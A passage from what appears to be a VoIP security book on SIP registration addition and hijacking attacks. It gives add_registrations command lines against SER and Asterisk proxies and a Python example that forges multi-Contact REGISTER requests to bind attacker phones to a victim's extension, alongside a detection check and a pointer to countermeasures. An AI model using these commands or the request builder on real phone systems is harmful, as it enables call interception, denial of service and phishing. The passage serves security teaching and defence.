The registration maintained by the SIP proxy/registrar can hold more than one contact, allowing a user to register multiple locations, such as their office, a conference room, a lab, and so on, all of which ring when an inbound call arrives. When multiple SIP phones ring, the first one to go off hook answers the call. This behavior creates the opportunity for several types of attacks. For example, you could add a number of contacts for each user, causing many SIP phones to ring for every inbound call, irritating and confusing users. You could also add the address of a SIP phone that you control and then quickly pick it up when it rings, thereby performing a basic registration hijack.
To demonstrate this attack, we developed the add_registrations tool. This tool sends a properly crafted REGISTER request containing a new contact for a user. The usage information for this tool is as follows:

add_registrations:

./add_registrations EthernetInterface NewContactUser NewContactIP TargetDomainIP DestinationIP

Usage Example:

./add_registrations eth0 3000 10.1.101.30 10.1.101.2 10.1.101.35 -e -h -v

Mandatory parameters:

EthernetInterface   The Ethernet interface, e.g., eth0.
NewContactUser      The user part of the new contact, e.g., john.doe or 5000 or "1+210-555-1212".
NewContactIP        The IPv4 address of the new contact.
TargetDomainIP      The IPv4 address of the SIP proxy to which the REGISTER request will be sent.
DestinationIP       The IPv4 address of the target SIP phone/user.

Optional parameters:

-e   Includes the current contact in the REGISTER request. This is needed for SIP proxies that replace, rather than add, the new contact.
-h   Help. Prints this usage information.
-v   Verbose. Enables verbose output.
This tool was tested against each of the SIP proxies in our lab, and they behave differently. The SER SIP proxy adds the new contact to the existing registration. The Asterisk SIP proxy replaces the current contact with the new one, so you must use the -e parameter for Asterisk. This causes the add_registrations tool to send two contacts (the current one and the new one). Because Asterisk replaces rather than adds, you cannot use add_registrations to accumulate more than one new contact on the Asterisk SIP proxy. The tool could be modified to accept a list of new contacts.
You can add one or more contacts for one or more SIP phones, so that when the intended user receives an inbound call, multiple SIP phones ring. When this attack is repeated for many SIP phones, so many phones will be ringing constantly that the wrong user answers the call, confusing both caller and callee. The following commands add three contacts (for the SER SIP proxy) and one contact (for the Asterisk SIP proxy) to existing SIP phones:

./add_registrations eth0 3000 10.1.101.30 10.1.101.2 10.1.101.45
./add_registrations eth0 3500 10.1.101.35 10.1.101.2 10.1.101.45
./add_registrations eth0 4000 10.1.101.40 10.1.101.2 10.1.101.45
./add_registrations eth0 6000 10.1.101.60 10.1.101.1 10.1.101.65 -e
In the first example, when an inbound call to extension 4500 occurs, four SIP phones will ring. The first user who goes off hook will answer the call. This example can easily be expanded to add multiple contacts for every phone.
The add_registrations tool can be used to add a new contact, performing a basic registration hijacking attack. Registration hijacking is covered in detail in the next section. This new contact would be for a SIP phone accessible to the attacker, who can answer the call more quickly than the actual user. This attack could be used very effectively if the target user is away from their SIP phone. Here are a couple of example commands:
./add_registrations eth0 3000 10.1.101.30 10.1.101.2 10.1.101.35
./add_registrations eth0 6000 10.1.101.60 10.1.101.1 10.1.101.65 -e
These commands add an additional contact, extensions 3000 and 6000, to extensions 3500 and 6500. When an inbound call to extension 3500 or 6500 is made, two SIP phones will ring, at extensions 3000 and 3500 or extensions 6000 and 6500. An attacker at extension 3000 or 6000 can answer the call quickly, thereby denying service to the intended user and possibly allowing a phishing or other attack.
Note that if you don't want the target user's SIP phone to ring at all, you can use the erase_registrations tool first. For the Asterisk SIP proxy, you can also leave off the -e parameter, which causes the command to replace the current registration with a new one.
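The following Python example is added here to make the mechanics concrete; it is not the add_registrations tool and not code from the book. It builds the kind of REGISTER request described above (the target user's address-of-record in To, one Contact header per location, with the victim's current contact optionally included the way -e does), models the two registrar behaviors described in the text (SER-style add and Asterisk-style replace), and adds one defender-side check: flagging a REGISTER whose Contact hosts differ from the host in its Via header, which is the pattern a third party adding someone else's contact produces. All addresses, extensions, the attacker host 10.1.101.99, and the Call-ID/tag values are constructed for the example.

```python
"""Construct, apply and inspect multi-Contact SIP REGISTER requests.

Added example, not the add_registrations tool. Addresses and extensions are
constructed; 10.1.101.99 is an assumed attacker host.
"""
import re
import uuid
from typing import Dict, List, Tuple

CRLF = "\r\n"
HEADER_RE = re.compile(r"^([A-Za-z-]+):\s*(.*)$")
CONTACT_URI_RE = re.compile(r"<sip:([^@>]+)@([^:;>]+)")


def build_register(domain: str, user: str, via_host: str,
                   contacts: List[Tuple[str, str]], expires: int = 3600,
                   cseq: int = 1) -> str:
    """Return a REGISTER for sip:user@domain carrying one Contact per (user, host).

    Passing the victim's current contact first plus the new one is the
    equivalent of add_registrations -e; passing only the new one is the
    replace-the-victim variant.
    """
    lines = [
        f"REGISTER sip:{domain} SIP/2.0",
        f"Via: SIP/2.0/UDP {via_host}:5060;branch=z9hG4bK{uuid.uuid4().hex[:12]}",
        f"From: <sip:{user}@{domain}>;tag={uuid.uuid4().hex[:8]}",
        f"To: <sip:{user}@{domain}>",
        f"Call-ID: {uuid.uuid4().hex}@{via_host}",
        f"CSeq: {cseq} REGISTER",
        "Max-Forwards: 70",
    ]
    for c_user, c_host in contacts:
        lines.append(f"Contact: <sip:{c_user}@{c_host}:5060>;expires={expires}")
    lines.append("Content-Length: 0")
    return CRLF.join(lines) + CRLF + CRLF


def parse_headers(msg: str) -> Tuple[str, Dict[str, List[str]]]:
    """Split a SIP message into its request line and a name -> values map."""
    head = msg.split(CRLF + CRLF, 1)[0]
    request_line, *header_lines = head.split(CRLF)
    headers: Dict[str, List[str]] = {}
    for line in header_lines:
        m = HEADER_RE.match(line)
        if m:
            headers.setdefault(m.group(1).lower(), []).append(m.group(2))
    return request_line, headers


def contact_uris(headers: Dict[str, List[str]]) -> List[str]:
    """Return every Contact URI as sip:user@host (port and params dropped)."""
    out = []
    for value in headers.get("contact", []):
        for part in value.split(","):
            m = CONTACT_URI_RE.search(part)
            if m:
                out.append(f"sip:{m.group(1)}@{m.group(2)}")
    return out


def apply_register(bindings: Dict[str, List[str]], msg: str, mode: str) -> List[str]:
    """Update the registrar's binding table for one REGISTER and return the AOR's contacts.

    mode "add" appends new contacts to the existing set (the SER behavior in
    the text); mode "replace" discards the old set (the Asterisk behavior).
    """
    _, hdr = parse_headers(msg)
    aor = "sip:" + re.search(r"<sip:([^>]+)>", hdr["to"][0]).group(1)
    new = contact_uris(hdr)
    if mode == "replace":
        bindings[aor] = list(new)
    else:
        current = bindings.setdefault(aor, [])
        for c in new:
            if c not in current:
                current.append(c)
    return bindings[aor]


def suspicious_contacts(msg: str) -> List[str]:
    """Return Contact URIs whose host differs from the Via sent-by host.

    A phone registering itself puts its own address in both; a REGISTER that
    binds a Contact on some other host is the registration-addition pattern.
    Caveat: NATed phones also trip this, and Via is attacker-controlled, so
    treat it as a triage signal, not proof.
    """
    _, hdr = parse_headers(msg)
    via_host = hdr["via"][0].split()[1].split(":")[0].split(";")[0]
    return [c for c in contact_uris(hdr) if c.split("@", 1)[1] != via_host]


if __name__ == "__main__":
    # Three attacker-chosen contacts added to extension 4500 on a SER-style registrar.
    ser = {"sip:4500@10.1.101.2": ["sip:4500@10.1.101.45"]}
    for ext, host in [("3000", "10.1.101.30"), ("3500", "10.1.101.35"), ("4000", "10.1.101.40")]:
        apply_register(ser, build_register("10.1.101.2", "4500", "10.1.101.99", [(ext, host)]), "add")
    print("SER bindings for 4500:", ser["sip:4500@10.1.101.2"])
    # Asterisk-style registrar: without the victim's own contact (-e) it is replaced outright.
    ast = {"sip:6500@10.1.101.1": ["sip:6500@10.1.101.65"]}
    hijack = build_register("10.1.101.1", "6500", "10.1.101.99", [("6000", "10.1.101.60")])
    print("Asterisk bindings after replace:", apply_register(ast, hijack, "replace"))
    print("Suspicious contacts:", suspicious_contacts(hijack))
```

With the three SER-style requests the binding table for 4500 ends up holding four contacts, matching the four ringing phones the text describes; the Asterisk-style request without the victim's own contact leaves only the attacker's phone registered. The Via-versus-Contact check is the cheap detection to run on REGISTER traffic at the proxy; it does not replace the countermeasures in the next section, since an attacker who spoofs the phone's source address can make Via agree with Contact.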
You can also use SiVuS to add registrations. Use the Utilities screen to create a REGISTER request for the current registration while adding a new contact. Figure 13-2 illustrates this attack.
These attacks can irritate and confuse your users. In an extreme case, where multiple contacts are added for many SIP phones, it is possible for users' phones to ring continually. The registration hijacking attack can be serious as well. See the next section for more information on the impact of registration hijacking.
For these attacks to take place, the attacker needs access to your internal network, which can occur when a user downloads a worm or virus with the ability to send packets that add registrations or if an attacker gains access to the internal network through another means. The add registrations attack is also possible from a public network if you use SIP trunks for access to your voice service provider.
You can employ several countermeasures to address registration addition attacks. These countermeasures are similar to those described in the "Countermeasures" section for erasing registrations.